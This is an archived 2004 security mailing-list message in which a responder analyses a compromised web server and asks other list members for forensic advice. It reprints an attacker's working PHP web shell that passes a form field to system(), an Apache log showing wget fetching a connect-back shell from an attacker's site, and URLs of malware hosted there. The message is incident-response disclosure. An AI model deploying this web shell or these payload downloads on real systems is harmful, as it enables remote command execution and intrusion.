lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <015701c4b9fc$a09e1bb0$0200000a@Accenture.com>
From: eflorio at edmaster.it (Elia Florio)
Subject: xpire.info & splitinfinity.info - exploits in the wild

> I'm not sure that qmail-inject isn't a red herring?  The actual
> download looks like 'wget' was used.
Good suggestion, my friend :)

It was used WGET to retrieve the http://xpire.info/cli.gz connectback shell.
After other analysis I've found that another person had the same problem:

http://groups.google.it/groups?hl=it&lr=&selm=2wrKc-2TW-49%40gated-at.bofh.it

Here the log trapped by Apache :

----------------------------------------------------------------------------
----
[Mon Aug 23 06:25:18 2004] [notice] Accept mutex: sysvsem (Default:
sysvsem)
ls: /usr/bin/X11/X: No such file or directory
sh: option `-c' requires an argument
ls: /usr/bin/X11/X: No such file or directory
sh: option `-c' requires an argument
ls: /usr/bin/X11/X: No such file or directory
ls: /usr/include/sdk386: No such file or directory
ls: /usr/bin/X11/X: No such file or directory
ls: /usr/include/sdk386: No such file or directory
ls: /usr/bin/X11/X: No such file or directory
--18:06:28--  http://xpire.info/cli.gz
=> `/tmp/a.out'
Resolving xpire.info... done.
Connecting to xpire.info[202.99.23.162]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,147 [text/plain]

0K .......... ........                                   100%   20.04
KB/s

18:06:29 (20.04 KB/s) - `/tmp/a.out' saved [19147/19147]
------------------------------------------------------------------------

If you compare the output, it's possible to see that in my first showed log
the stdout
was in italian language (cause compromised server is .it), in this case is
in english language.
The hacker launched WGET command to retrieve his hacking tool in /tmp/a.out
In this log you can see also that the hacker also try to execute some "ls"
command,
as first trial to test vulnerability I suppose.
Moved by this, after other analysis I found that vulnerability used is an
obvious-but-effective PHP-Injection
using global variables (http://www.securityfocus.com/archive/1/218000 is a
good page to learn
something about this vuln).

The hacker page used to accomplish the injection are based on this
test-page, taken directly on the hacker-site :-)

http://xpire.info/s/2
http://xpire.info/s/

I notice that this site is full of trojan/backdoor/shell/worm/exploit and
other malware....why is it still open?

http://xpire.info/cli.gz            // connect back shell
http://xpire.info/fa/aga.exe    // agobot family
http://xpire.info/install.gz        // some trojan/malware ???? my NortonAV
does not catch it; it's a Windows-EXE

This is the sample of PHP-Injection page:
<?
$OS = system('uname -a');
$X = system('ls -la /usr/bin/X11/X');
echo "<OS>".$OS."</OS><br>";
echo "<X>".$X."</X>";
?>
<form action="<?=$REQUEST_URI;?>" method=POST>
<input type=text name=lox value='<?=$lox;?>' size=40><br>
<input type=submit>
</form>
<pre>
<xmp>
<?=system($lox);?>
</xmp>
</pre>
Using PHP "system" call, it possible to execute any remote command, like
WGET for example.
Anyone knows before this page???


> I assume you used a bootable CD on the infected machine to do the
checksums?
Unfortunately (I know that this is a *must* for a good analysis) I'm doing
the check remotely,
using SSH, so I cannot use a bootable CD to connect at this remote host very
far from me :)
I'm limited in the analysis.....but the host is not mine!
However I think that md5um give me good results, because I compared all the
/usr/sbin directory
and all the checksum were good, except for /usr/sbin/crond......any ideas???
I used also "rpm -Vf" utility to cross check results, and were the same of
md5sum.

> Check the httpd.conf (and other apache configuration files) for any
> changes, and also the contents of each module loaded.  It's also
> possilble, but less likely, that the injection is done in a kernel
> module.
It's my fear :(((((((((( I studied all *.conf related to Apache/PHP modules
of this
machine, but nothing was found. A LKM injected could be the only response.

I also ran "chkrootkit" as someone suggest to me, but all the test give
positive answer
(no worm, no rootkit, no trojan)

> Sounds like a good time to replace the entire server with a fresh build.
Actually my work will finish when this activity will begin :))))))

Thank you for the help, Kevin.

EF


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ